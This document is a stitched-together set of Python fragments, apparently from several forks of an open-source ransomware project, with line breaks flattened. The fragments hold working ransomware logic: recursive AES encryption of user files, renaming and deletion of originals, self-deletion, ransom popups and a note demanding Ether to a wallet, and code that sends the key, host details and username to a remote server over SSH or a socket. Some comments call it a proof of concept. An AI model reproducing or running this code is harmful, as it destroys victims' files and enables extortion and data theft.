def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] #Decrypt mode: if decrypt: # Get key from stdin key = binascii.unhexlify(decrypt) # TODO: Remove print print(binascii.hexlify(key)) ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) pre_decrypt() for currentDir in startdirs: for file in discover.discoverFiles(currentDir, 0): modify.modify_file_inplace(file, crypt.decrypt) #Encrypt mode else: # Generate random 128 bits key key = Random.get_random_bytes(16) # TODO: Remove print print(binascii.hexlify(key)) ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) for currentDir in startdirs: for file in discover.discoverFiles(currentDir, 0): modify.modify_file_inplace(file, crypt.encrypt) post_encrypt() # Send key over SSH; Notice hexlify before connect remote.connect(HOSTNAME, USERNAME, PASSWORD, str(binascii.hexlify(key))) #Self destroy self_path = os.path.abspath(__file__) sp.call(["/bin/rm", self_path[:-12]]) #sp.call(["/bin/rm", self_path[:-3]]) #Popup Message popup()
def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: key = 'saveusfrompsgpls' else: if HARDCODED_KEY: key = HARDCODED_KEY ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) startdirs = ['/Users/mercifulrookie/Desktop/syssec'] #PUT YOURS PRAVIN, I USED /NARAYANAA for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) for _ in range(100): #key = random(32) pass if not decrypt: pass
def decrypt(key): if check_key(key): l = tkinter.Label( root, text="This is the correct key. \n" "Your files are being decrypted but it may take a while. Please wait..." ) l.pack() ctr = Counter.new(128) crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr) startdirs = START_DIR for currentDir in startdirs: for file in discover.discoverFiles(currentDir): (name, ext) = os.path.splitext(file) if ext in '.Cryptsky': try: modify.modify_file_inplace(file, crypt.encrypt) os.rename(file, name) except IOError: print("Error") try: print() os.remove(r'C:\Windows\Temp\winUpdater.log') except FileNotFoundError: pass label = tkinter.Label( root, text="Congratulations. Your files are now decrypted") label.pack() else: return False
def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: print ''' Ransomware! --------------- Your files have been encrypted. ''' key = raw_input('Enter Your Key> ') else: key = generate_key() ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) startdirs = ['/media/bin4rygh0st/UBUNTU 19_1/'] for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) print("Your System has been Decrypted!!") for _ in range(100): key = randint(0, 999999999999) pass if not decrypt: pass
def pre_decrypt(): for currentDir in startdirs: for file in discover.discoverFiles(currentDir, 1): ext = file.split('.')[-1] if ext == 'encrypted': os.rename(file, file[:-10]) else: os.remove(file)
def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: print ''' AnkurCryWare! --------------- Your files have been encrypted. This is normally the part where I would tell you to pay a ransom, and I will send you the decryption key. However, this is an open source project to show how easy malware can be to write and to allow others to view what may be one of the first fully open source python ransomwares. This project does not aim to be malicious. The decryption key can be found below, free of charge. Please be sure to type it in EXACTLY, or you risk losing your files forever. Do not include the surrounding quotes, but do make sure to match case, special characters, and anything else EXACTLY! Happy decrypting and be more careful next time! Your decryption key is: '{}' '''.format(HARDCODED_KEY) key = raw_input('Enter Your Key> ') else: # In real ransomware, this part includes complicated key generation, # sending the key back to attackers and more # maybe I'll do that later. but for now, this will do. if HARDCODED_KEY: key = HARDCODED_KEY else: key = random(32) ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) # change this to fit your needs. startdirs = ['/'] for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) os.rename(file, file+'.AnkurCryWare') # append filename to indicate crypted # This wipes the key out of memory # to avoid recovery by third party tools for _ in range(100): key = random(32) pass if not decrypt: pass # post encrypt stuff # desktop picture # icon, etc print "Your device is encrypted by AnkurCryWare
def main(): if PATH.is_file(): print("Already Encrypted :)") window_thread = WindowThread() window_thread.start() time.sleep(10) safe = tkinter.Label( root, text="It is now safe to stop execution of this program. " "Hopefully you found the key ;)") safe.pack() else: key = HARDCODED_KEY ctr = Counter.new(128) crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr) # change this to fit needs. startdirs = START_DIR # starts window so it appears while files are still being encrypted window_thread = WindowThread() window_thread.start() # encrypt files for currentDir in startdirs: for file in discover.discoverFiles(currentDir): try: modify.modify_file_inplace(file, crypt.encrypt) os.rename( file, file + '.Cryptsky') # append filename to indicate crypted except IOError: print("Error") # write evidence file to disk file = open(PATH, 'w+') file.write("JBOOZ encrypted this with a custom version of CryptSky. " "The key for this version is: yellow submarine" ) # you're welcome blue team ;) file.close() safe = tkinter.Label( root, text="It is now safe to stop execution of this program. " "Hopefully you found the key ;)") safe.pack() ''' # Taken out for Case Studies
def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: print ''' *ULTRA YEET* --------------- Your files have been encrypted. Pay a ransom of .5 ETH to 0x8dfaC9f5E011CD1Ce1d5b7537a1c6E9703902aCA If you do not pay this ransom you're files will be lost >:3 Your decryption key will bee given to you once proof of payment is received '''.format(HARDCODED_KEY) key = raw_input('Enter Your Key> ') else: if HARDCODED_KEY: key = HARDCODED_KEY # else: # key = random(32) ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) # change this to do what you want startdirs = ['/home'] for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) #os.rename(file, file+'.Cryptsky') # append filename to indicate crypted # This wipes the key out of memory # to avoid recovery by third party tools for _ in range(100): #key = random(32) pass if not decrypt: pass
def main(): if len(sys.argv) <= 1: print('[*] Ransomware - PoC\n') # banner() print('Usage: python3 main_v2.py -h') print('{} -h for help.'.format(sys.argv[0])) exit(0) # Parse arguments args = parse_args() encrypt = args.encrypt decrypt = args.decrypt absolute_path = str(args.path) # Force one click and comment out args above # absolute_path = "None" # encrypt = True # decrypt = False if absolute_path != 'None': startdirs = [absolute_path] else: # Check OS plt = platform.system() if plt == "Linux" or plt == "Darwin": startdirs = [os.environ['HOME'] + '/test_ransomware'] elif plt == "Windows": startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware'] # Can also hardcode additional directories # startdirs = [os.environ['USERPROFILE'] + '\\Desktop', # os.environ['USERPROFILE'] + '\\Documents', # os.environ['USERPROFILE'] + '\\Music', # os.environ['USERPROFILE'] + '\\Desktop', # os.environ['USERPROFILE'] + '\\Onedrive'] else: print("Unidentified system") exit(0) # Encrypt AES key with attacker's embedded RSA public key server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY) encryptor = PKCS1_OAEP.new(server_key) encrypted_key = encryptor.encrypt(HARDCODED_KEY) encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii") print("Encrypted key " + encrypted_key_b64 + "\n") if encrypt: key = HARDCODED_KEY if decrypt: # RSA Decryption function - warning that private key is hardcoded for testing purposes rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY) decryptor = PKCS1_OAEP.new(rsa_key) key = decryptor.decrypt(base64.b64decode(encrypted_key_b64)) # Create AES counter and AES cipher ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) # Recursively go through folders and encrypt/decrypt files for currentDir in startdirs: for file in discover.discoverFiles(currentDir): if encrypt and not file.endswith(extension): modify.modify_file_inplace(file, crypt.encrypt) os.rename(file, file + extension) print("File changed from " + file + " to " + file + extension) if decrypt and file.endswith(extension): modify.modify_file_inplace(file, crypt.encrypt) file_original = os.path.splitext(file)[0] os.rename(file, file_original) print("File changed from " + file + " to " + file_original) if encrypt: # Exfiltrate encrypted key to C2 def connector(): server = socket.socket(socket.AF_INET) server.settimeout(10) try: # Send Key server.connect((host, port)) msg = '%s$%s$%s$%s$%s$%s' % ( getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node()) server.send(msg.encode('utf-8')) # if plt == "Windows" main = mainwindow(encrypted_key_b64) main.mainloop() except Exception as e: # if plt == "Windows" # Do not send key, encrypt anyway. main = mainwindow(encrypted_key_b64) main.mainloop() pass try: connector() except KeyboardInterrupt: sys.exit(0) # This wipes the key out of memory # to avoid recovery by third party tools for _ in range(100): #key = random(32) pass
def main(): if len(sys.argv) <= 1: print('[*] Ransomware - PoC\n') # banner() print('Usage: python3 main.py -h') print('{} -h for help.'.format(sys.argv[0])) exit(0) # Parse arguments args = parse_args() encrypt = args.encrypt decrypt = args.decrypt absolute_path = str(args.path) # Force one click and comment out args above # absolute_path = "None" # encrypt = True # decrypt = False if absolute_path != 'None': startdirs = [absolute_path] else: # Check OS plt = platform.system() if plt == "Linux" or plt == "Darwin": startdirs = [os.environ['HOME'] + '/test_ransomware'] elif plt == "Windows": startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware'] # Can also hardcode additional directories # startdirs = [os.environ['USERPROFILE'] + '\\Desktop', # os.environ['USERPROFILE'] + '\\Documents', # os.environ['USERPROFILE'] + '\\Music', # os.environ['USERPROFILE'] + '\\Desktop', # os.environ['USERPROFILE'] + '\\Onedrive'] else: print("Unidentified system") exit(0) # Encrypt AES key with attacker's embedded RSA public key server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY) encryptor = PKCS1_OAEP.new(server_key) encrypted_key = encryptor.encrypt(HARDCODED_KEY) encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii") print("Encrypted key " + encrypted_key_b64 + "\n") if encrypt: print("[COMPANY_NAME]\n\n" "YOUR NETWORK IS ENCRYPTED NOW\n\n" "USE - TO GET THE PRICE FOR YOUR DATA\n\n" "DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n" "DO NOT RENAME OR MOVE THE FILE\n\n" "THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n" "[begin_key]\n{}\n[end_key]\n" "KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY)) key = HARDCODED_KEY if decrypt: # # RSA Decryption function - warning that private key is hardcoded for testing purposes rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY) decryptor = PKCS1_OAEP.new(rsa_key) key = decryptor.decrypt(base64.b64decode(encrypted_key_b64)) # Create AES counter and AES cipher ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) # Recursively go through folders and encrypt/decrypt files for currentDir in startdirs: for file in discover.discoverFiles(currentDir): if encrypt and not file.endswith(extension): modify.modify_file_inplace(file, crypt.encrypt) os.rename(file, file + extension) print("File changed from " + file + " to " + file + extension) if decrypt and file.endswith(extension): modify.modify_file_inplace(file, crypt.encrypt) file_original = os.path.splitext(file)[0] os.rename(file, file_original) print("File changed from " + file + " to " + file_original) # This wipes the key out of memory # to avoid recovery by third party tools for _ in range(100): #key = random(32) pass
return parser if __name__=="__main__": parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: key = 'saveusfrompsgpls' else: if HARDCODED_KEY: key = HARDCODED_KEY ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) startdirs = ['/Users/testDirectory/'] #PLEASE INSERT DIRECTORY ACCORDING TO YOUR NEED for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) for _ in range(100): #key = random(32) pass if not decrypt: pass
def post_encrypt(): for currentDir in startdirs: for file in discover.discoverFiles(currentDir, 0): shutil.copy2(file, file + '.encrypted') modify.overwrite_file_inplace(file)